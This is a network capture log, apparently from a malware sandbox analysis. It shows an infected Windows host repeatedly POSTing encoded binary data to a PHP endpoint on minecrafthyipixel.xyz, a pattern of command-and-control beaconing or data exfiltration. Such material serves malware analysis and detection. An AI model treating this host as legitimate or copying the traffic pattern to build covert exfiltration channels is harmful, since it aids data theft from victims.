                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMoh1Xo9zZkBfAu%2FJvTXBdMfri4a6iVL%2BOAnrVVZr99DrgTB%2F%2Fxyborj5ADX%2F1No841nC%2Fc3JSZYe30YBRSEqDh6MXTIxHR54712IqGtBRSdWznv%2B4g1TmmW5q56dSioD7UqPKE1P7o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4542ad97bc0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:19.006521940 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    164 | 192.168.2.4 | 49918 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:19.233179092 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:19.338112116 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:19.338382959 CEST | 2512 | OUT
                                                                                                                                    Apr 19, 2024 13:44:19.693661928 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:19 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bq7BywHMZyWhQ6V%2BDBhjS0Z7OpBK%2B44%2BCjJdbohsh6BQLL8qfYRWI5uK2U0RF2QSLv5c%2FpL09wMDRH9VsuMKKoJ4myb1jtFPHtsOs2wNFPRgUs5P2tZwEqvRpoy0hVjb4SeYeZ0MIeQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca45888d27bc0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:19.694112062 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    165 | 192.168.2.4 | 49919 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:19.921874046 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:20.026436090 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:20.026846886 CEST | 2512 | OUT
                                                                                                                                    Apr 19, 2024 13:44:20.383475065 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:20 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2F0H7JSsOlz1Jr5fQ5YtYtwcutqxJ3l1xFOk7qCV%2FQ%2FKYtqmhWeXl1GlU8onzCc09%2BkGJU2Gor92%2Fk7MojUK7quhiAjE%2FOfO5SHzuAqhBGDB9zXh62oqJkUI9qzsxXdhJ6gKmT1N0hI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca45cdf5d8bb7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:20.383547068 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    166 | 192.168.2.4 | 49920 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:20.616400003 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:20.720829964 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:20.720957041 CEST | 2512 | OUT
                                                                                                                                    Apr 19, 2024 13:44:20.983758926 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:20 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D4lxsrPr7sZw2BcwfkDvPPs58%2FMkzxRDizZ3V8fKh05HECEP7An1zJvEihFj8D7o4ao2oOBmA%2BajIPGAtWidPCcSiu7Qnl%2B88QfppF2X3jiHF5pWKxICYurSaoZFeOLsAnztJ6OoggE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4613f8053f6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:20.983819008 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    167 | 192.168.2.4 | 49921 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:21.209007025 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:21.313824892 CEST  25  IN  HTTP/1.1 100 Continue
Apr 19, 2024 13:44:21.313988924 CEST  2512  OUT  Data Raw: 52 59 5b 5b 5c 41 54 5a 5c 5e 59 59 57 5e 58 58 54 54 5f 59 54 5f 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY[[\ATZ\^YYW^XXTT_YT_S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'="S6]$[& _0+6?(7\'91.W#""V*;\7?$Z.$[. X
Apr 19, 2024 13:44:21.570853949 CEST  613  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:21 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oivfT7dp6AaJr1lPB0yJiCe0dAMj79lgplsBnaGXhYJNFhqBh0pZOqe8hmdPuAW3Fbxwr8Oo1nWZTHdYczLuBaM8jNSIn144HRmr1RKH7PyZ08ZrKc5hWfrf4WRWtqktHhJfnKxiBp0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca464eac64533-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:21.570915937 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
168         192.168.2.4  49922        104.21.57.61    80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 13:44:21.799875021 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:21.905078888 CEST  25  IN  HTTP/1.1 100 Continue
Apr 19, 2024 13:44:21.905301094 CEST  2504  OUT  Data Raw: 57 59 5e 5c 5c 44 54 59 5c 5e 59 59 57 57 58 5f 54 51 5f 5f 54 58 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^\\DTY\^YYWWX_TQ__TXSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1=55;?& ;['-T)'1_3%(" Q>+4#?0Z:$[. X 5
Apr 19, 2024 13:44:22.161755085 CEST  621  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:22 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MvDLrOzmoaj5tuN3xPBODdHMelzmuxY13J54%2BKkUchhKTBiP3l7yCOJThELyDLTL4RZ8mYBYGw57d0QAxoX3kvYgr%2FpBonG%2FBbV%2BSOgbejS5gAoSau2D8wPlI5F8fYfXR1c3YeGucg8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4689aecad6e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:22.161809921 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
169         192.168.2.4  49923        104.21.57.61    80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 13:44:22.395687103 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:22.500221968 CEST  25  IN  HTTP/1.1 100 Continue
Apr 19, 2024 13:44:22.500366926 CEST  2512  OUT  Data Raw: 57 5c 5b 59 59 42 51 58 5c 5e 59 59 57 54 58 5f 54 54 5f 5b 54 5b 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[YYBQX\^YYWTX_TT_[T[SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1>V6;70\'1P)^ '*$U2;6V7%) ?0-5$[. X )
Apr 19, 2024 13:44:22.758943081 CEST  619  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:22 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BLj%2By2NlN1OjEdKeAy%2BCnZ9pqFq3Pm8DmGFfvFUZA3afnRk2RfSOUkycysJcGzKJa9Cme8fwciynUUkKiDNtaNM7o3c3zswamiVwsUpoMyBrRznHVfmgR9WARW0F6gwp0vp0EIax4C4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca46c4a297bd6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:22.759006023 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
170         192.168.2.4  49924        104.21.57.61    80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 13:44:22.991090059 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:23.096529961 CEST  25  IN  HTTP/1.1 100 Continue
Apr 19, 2024 13:44:23.096766949 CEST  2512  OUT  Data Raw: 57 5c 5e 55 59 42 54 5d 5c 5e 59 59 57 52 58 5f 54 52 5f 59 54 5e 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^UYBT]\^YYWRX_TR_YT^SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]'.5"+X$ ;Z0==+'_2U185!2W*+,#//-$[. X 1
Apr 19, 2024 13:44:23.361951113 CEST  625  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:23 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HCiWDj2qWJBGHhkevK0rA2xGyjy1iAg%2FKMKj8DnDB5hxfEzo111P97OJA2gvkqHa%2F43ZshKC4O83s5v%2FD0gr%2BuQrWfKR70CHAbEYZkCXPEkJNLNN9Z3POb3RDyxS5RsbHfGq%2FwUGc%2BU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca470087b06e6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:23.362014055 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
171         192.168.2.4  49925        104.21.57.61    80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 13:44:23.599805117 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:23.706543922 CEST  25  IN  HTTP/1.1 100 Continue
Apr 19, 2024 13:44:23.706904888 CEST  2512  OUT  Data Raw: 57 5b 5b 5e 59 4a 54 5b 5c 5e 59 59 57 50 58 5b 54 55 5f 5e 54 54 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[[^YJT[\^YYWPX[TU_^TTSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%-*S"?$#;_$*=^(1:,S%)71)877<#:%$[. X


Session ID  Source IP    Source Port  Destination IP  Destination Port
172         192.168.2.4  49926        104.21.57.61    80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 13:44:23.894087076 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:23.998959064 CEST  25  IN  HTTP/1.1 100 Continue
Apr 19, 2024 13:44:23.999355078 CEST  2192  OUT  Data Raw: 52 5d 5e 5d 59 42 54 55 5c 5e 59 59 57 56 58 5a 54 5b 5f 5c 54 5e 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^]YBTU\^YYWVXZT[_\T^S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>2R ;'&0#Z%;1*8% T1>R#2-+; /$-$[. X !
Apr 19, 2024 13:44:24.268405914 CEST  764  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:24 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oz6I%2BBS6Gwwbm9nHe2rAnGiBc5IRBlxlRIxYWF97WqMwFDJgRlgmCW5wFKu8MorxXyubcSF5dk3yfcVsfkQOhYcJ6ZviVY8obc9Gm6u2VRXeAw5910oswNfIehxUzZGBtq0jMAo2jjg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca475aa40b062-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5e 24 26 31 05 21 03 3f 5a 3d 1d 26 11 2a 0e 22 06 3e 39 26 05 37 3e 38 1f 2f 39 3b 04 3f 05 21 07 25 23 29 52 30 5b 24 18 31 1a 21 59 00 1a 39 5c 34 3c 3e 04 2e 39 0c 01 3c 31 22 00 20 0b 2f 5a 28 2e 29 50 34 38 01 5c 3d 2e 21 51 2d 28 24 57 2b 38 35 18 2d 24 31 07 36 01 2c 52 09 12 25 53 2b 01 3c 13 26 30 0b 50 22 21 34 10 3c 3f 22 58 24 38 30 51 32 1d 23 05 3a 0b 32 55 32 07 39 53 3d 04 24 56 23 2f 2a 0f 25 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$^$&1!?Z=&*">9&7>8/9;?!%#)R0[$1!Y9\4<>.9<1" /Z(.)P48\=.!Q-($W+85-$16,R%S+<&0P"!4<?"X$80Q2#:2U29S=$V#/*%.^,+H0TW
Apr 19, 2024 13:44:24.268465996 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
173         192.168.2.4  49927        104.21.57.61    80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 13:44:24.014947891 CEST  362  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:44:24.121318102 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:24.121577024 CEST | 2512 | OUT | Data Raw: 57 59 5b 5c 59 46 51 59 5c 5e 59 59 57 52 58 5b 54 51 5f 59 54 5a 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY[\YFQY\^YYWRX[TQ_YTZS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\1X>5((['34$P=;&?1;*Q 2T>#8/5$[. X 1
Apr 19, 2024 13:44:24.394393921 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:24 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ze3Dlbh8mUJfaXwZWLfk9L7unqgWH5ATRdMl1kdKZhGIu5kuh0Js7PFtJhScKN%2BmdMxO9CjC3UMtnNSFrnHyzCHqqSxJY%2Bo%2B08bz2I2kTECzaxrzPjxIn2aKvpfurP7voOvE2LscirE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4766c7944d7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:24.394457102 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
174 | 192.168.2.4 | 49928 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
